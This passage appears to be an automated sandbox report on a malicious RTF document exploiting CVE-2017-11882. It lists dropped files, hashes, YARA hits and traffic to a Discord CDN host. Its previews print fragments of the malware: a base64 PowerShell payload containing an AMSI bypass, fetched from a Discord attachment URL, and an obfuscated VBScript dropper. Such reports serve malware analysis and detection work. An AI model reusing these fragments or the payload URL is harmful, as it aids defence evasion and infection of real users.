                                                      IRQ2107797.ppamGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      part-1500645108.xlsbGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      invoice template 33142738819.docxGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      item-40567503.xlsbGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      item-107262298.xlsbGet hashmaliciousBrowse
                                                      • 162.159.135.233

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\m[1].jpg
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):1920730
                                                      Entropy (8bit):4.744429581128775
                                                      Encrypted:false
                                                      SSDEEP:24576:npBYI4sL/QQX5YfBHzOK+haVIxK5cmZRc7TlD1cpj5:bX5YZHWaVIxK+mHcflD1Il
                                                      MD5:DE726DD453796B237393F7E160EB25E2
                                                      SHA1:AA6FAC0E5EFD84816494AAA746DAA382F571E9B3
                                                      SHA-256:1755604F7786452EE2991D3193193153F4A9F4C4C708204D64B9135CD6F26A3C
                                                      SHA-512:52B02A3E6A17AAF6D84219DDE9D2E1B7BA672FB6F1B03919C6C85D80F9A6C5E6C9C675895A4CFF0EE46FF1AD4802C902DB4F99E7C7B62477645F25A750A25D11
                                                      Malicious:false
                                                      Reputation:low
                                                      IE Cache URL:https://cdn.discordapp.com/attachments/915347845752705109/915799206072045578/m.jpg
                                                      Preview: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYSA9IFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uQW1zaVV0JysnaWxzJykNCiRoID0gIjQ0NTY2MjUyMjA1NzUyNjMxNzQ0NTI1NTQ4NDciDQokcyA9IFtzdHJpbmddKDAuLjEzfCV7W2NoYXJdW2ludF0oNTMrKCRoKS5zdWJzdHJpbmcoKCRfKjIpLDIpKX0pLXJlcGxhY2UgIiAiDQokYiA9ICRhLkdldEZpZWxkKCRzLCdOb25QdWJsaWMsU3RhdGljJykNCiRiLlNldFZhbHVlKCRudWxsLCR0cnVlKTsgJGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOw0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                      Category:dropped
                                                      Size (bytes):14848
                                                      Entropy (8bit):4.812816781063635
                                                      Encrypted:false
                                                      SSDEEP:192:7Nvugo5qhwPXk3Ur1yF9q2Jh9tp3F5lQtFQ+:7o4K/k3UrEo2Jh9tpV5lQt+
                                                      MD5:30E8134C66F2CE7C35BD554D66974D08
                                                      SHA1:5ED39A43359A7F2CF00D093B61E658A5F0072D01
                                                      SHA-256:369A7416A65B62AA8A3CC7EB8EFD2C2D8255B3D502931EB7ABFDB359926CDAF4
                                                      SHA-512:6074FB6CC8FBE3E6FC898F8D62E00E186911152AAC831276A94C4B83DC736212F8746BEC53EFA97C52B5811A423F086845CBA99B7DDF510FCF2C4D0F536AA1D3
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, Author: John Davison
                                                      • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, Author: ReversingLabs
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3C4C0964-F4E2-47CE-9342-09F02AAEAA3F}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4420D3E3-CE9B-451F-BDF0-DF912D785C06}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):1.1722028273607172
                                                      Encrypted:false
                                                      SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                      MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                      SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                      SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                      SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                      Malicious:false
                                                      Preview: ..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.
                                                      C:\Users\user\AppData\Local\Temp\Client.vbs
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8464
                                                      Entropy (8bit):5.294959126164496
                                                      Encrypted:false
                                                      SSDEEP:192:Kugo5qhwPXk3Ur1yF9q2Jh9tp3F5lQtFw:H4K/k3UrEo2Jh9tpV5lQti
                                                      MD5:ADD66C29C9FCCD7D098554FDC028172E
                                                      SHA1:3E816CBEAB5729A796A6396626D94FB7DAA7C208
                                                      SHA-256:B893967283A7085083CF7BBA86C0B1ED15AAD5783F45853D7213F1804246C07D
                                                      SHA-512:81C24DD500516C4B701CD101020FE79DC5EC91D9796C987DAC897306400678113FEFB0D0A0E3A5B5D04440D4E3DDB9DE2DDE47751B8C6F584D9665AD422DF7EA
                                                      Malicious:true
                                                      Preview: SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the fil
                                                      C:\Users\user\AppData\Local\Temp\Client.vbs:Zone.Identifier
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:gAWY3n:qY3n
                                                      MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                      SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                      SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                      SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                      Malicious:true
                                                      Preview: [ZoneTransfer]..ZoneId=3..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ-CIF DT22.LNK
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:55 2021, mtime=Mon Aug 30 20:08:55 2021, atime=Fri Dec 3 01:25:16 2021, length=2186640, window=hide
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):4.55531324967487
                                                      Encrypted:false
                                                      SSDEEP:12:80ldN6C0gXg/XAlCPCHaXjByB/AVtX+WR6L57OuicvbKRtDtZ3YilMMEpxRljKZ8:8ed8/XTTc+bo72e+LDv3q0R7m
                                                      MD5:749C635C18D5512E0F197CAB17048A47
                                                      SHA1:5E29EFECF25DC7BEEFC0B07AD790E9AC009491CA
                                                      SHA-256:D6F5642556529AC2AE22F75A43A180DC00E483EA7EEEE7935F0D14710522BE5F
                                                      SHA-512:96839E16C325B4491CC926CCF8988FD920D03E10E03FF16DB550B06E78A976FE5A3A68F83EF59DF8E57FEA0E6E6B47A2958AAE71F74DB7DCF8F0C9FEE63BC7D9
                                                      Malicious:false
                                                      Preview: L..................F.... ....1.=....1.=...P.v......]!..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2..]!..S). .RFQ-CI~1.DOC..N.......S...S..*.........................R.F.Q.-.C.I.F. .D.T.2.2...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\971342\Users.user\Desktop\RFQ-CIF DT22.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q.-.C.I.F. .D.T.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......971342..........D_....3N...W...9..g............[D_....3N...W
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):75
                                                      Entropy (8bit):4.852040277613462
                                                      Encrypted:false
                                                      SSDEEP:3:bDuMJlvDhxLUmX1FlhxLUv:bCkJw
                                                      MD5:E478B6695C14BFD45080736C657C9DA8
                                                      SHA1:8AFE29DB5E61C261A803727E23D451C47E8C6C03
                                                      SHA-256:84D6786544B4E0E402A83989D6512D49AF1392B67A119210E1F3971E1D556BC4
                                                      SHA-512:B7EBA5503968DC20399E3A96281D353BAAFC2DAFF2A2CC922F91B423A045FF9EE20E75741843D74EA21389C5BE0F4F14686AB367182595486EA8FCC996DEBD58
                                                      Malicious:false
                                                      Preview: [folders]..Templates.LNK=0..RFQ-CIF DT22.LNK=0..[doc]..RFQ-CIF DT22.LNK=0..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.5038355507075254
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.5767705248043695
                                                      Encrypted:false
                                                      SSDEEP:96:chQC4MqKqvsqvJCwo6z8hQC4MqKqvsEHyqvJCworUzKAYnHhUVX/lUV4A2:cmzo6z8mnHnorUzKtUVXrA2
                                                      MD5:204BEE1F37AFC85A6C699A7BB13BFAE5
                                                      SHA1:AB15195A1918ADB6CC9EFFA0472083578E82B982
                                                      SHA-256:A44BD247E61B952BBF46D8493C6A66043CE37085C848C5C12EB809B51E7D9FE0
                                                      SHA-512:3588673DA85416A0955C8E03FDAFF27F111E2B79BB1F5760400AC3D70701ECAF5C7581B828079CF268FD43D62303DF16FB0DF18F7004E95C3925FD62E9EF2B56
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KK4DZQVDIZP6O1GVC4FY.temp
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.5767705248043695
                                                      Encrypted:false
                                                      SSDEEP:96:chQC4MqKqvsqvJCwo6z8hQC4MqKqvsEHyqvJCworUzKAYnHhUVX/lUV4A2:cmzo6z8mnHnorUzKtUVXrA2
                                                      MD5:204BEE1F37AFC85A6C699A7BB13BFAE5
                                                      SHA1:AB15195A1918ADB6CC9EFFA0472083578E82B982
                                                      SHA-256:A44BD247E61B952BBF46D8493C6A66043CE37085C848C5C12EB809B51E7D9FE0
                                                      SHA-512:3588673DA85416A0955C8E03FDAFF27F111E2B79BB1F5760400AC3D70701ECAF5C7581B828079CF268FD43D62303DF16FB0DF18F7004E95C3925FD62E9EF2B56
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\Desktop\~$Q-CIF DT22.doc
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.5038355507075254
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                      Static File Info

                                                      General

                                                      File type:Rich Text Format data, version 1, unknown character set
                                                      Entropy (8bit):5.158217624869737
                                                      TrID:
                                                      • Rich Text Format (5005/1) 55.56%
                                                      • Rich Text Format (4004/1) 44.44%
                                                      File name:RFQ-CIF DT22.doc
                                                      File size:2186640
                                                      MD5:66c72e808d6803f22fcd6ec419a6f039
                                                      SHA1:0ac316f9fd8f6b3d8cfd05924f2c3704df112df7
                                                      SHA256:0c5704edd32b5754f2caf5a45caef11e0fa1a9381c84b05f391b9b8d1c101a3a
                                                      SHA512:6222a0e54447ae37615ab7cbcfc9d7386802b77692f96b30c285c24ca520e3cee9c0b83dceb0581a870ff47f0ed8d852146202ec9c86de5877b82a8a12154aef
                                                      SSDEEP:1536:Ibz4J3fbgjEE7wcwEwrwDwlwSwEw7wlwbwXwHwlwLwzwMwOwZwww7wlwbwXwHwlj:7E
                                                      File Content Preview:{\rtf1\posx2160{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnh

                                                      File Icon

                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                      Static RTF Info

                                                      Objects

                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                      0000011FEh2embeddedPackage8631Client.vbsC:\Path\Client.vbsC:\Path\Client.vbsno
                                                      10001CF7Bh2embeddedEquation.33072no

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      12/02/21-18:26:36.226933ICMP382ICMP PING Windows192.168.2.22216.58.215.238
                                                      12/02/21-18:26:36.226933ICMP384ICMP PING192.168.2.22216.58.215.238
                                                      12/02/21-18:26:36.248280ICMP408ICMP Echo Reply216.58.215.238192.168.2.22

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 2, 2021 18:26:37.250333071 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.250386000 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.250560045 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.269045115 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.269078016 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.324651957 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.324786901 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.335530043 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.335551023 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.335884094 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.335958004 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.637428999 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.680905104 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.681747913 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.681962967 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.681984901 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682079077 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682090998 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682157993 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682176113 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682250977 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682270050 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682441950 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682533026 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682562113 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682581902 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682634115 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682651997 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682729959 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682750940 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682826996 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682847977 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.682938099 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.682952881 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683042049 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683062077 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683136940 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683149099 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683228016 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683245897 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683379889 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683397055 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683443069 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683454037 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683507919 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683545113 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683669090 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683684111 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683836937 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683856964 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.683947086 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.683958054 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684022903 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.684035063 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684144974 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.684161901 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684218884 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.684236050 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684365034 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.684385061 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684519053 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684561968 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.684581041 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684595108 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.684717894 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.684737921 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684911966 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.684916019 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.684951067 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.685054064 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.685070992 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.685091972 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.685236931 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.685261965 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.685425997 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.685537100 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.685560942 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.685621977 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.685631990 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.685642958 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.685792923 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.685796976 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.685826063 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.685905933 CET49165443192.168.2.22162.159.135.233
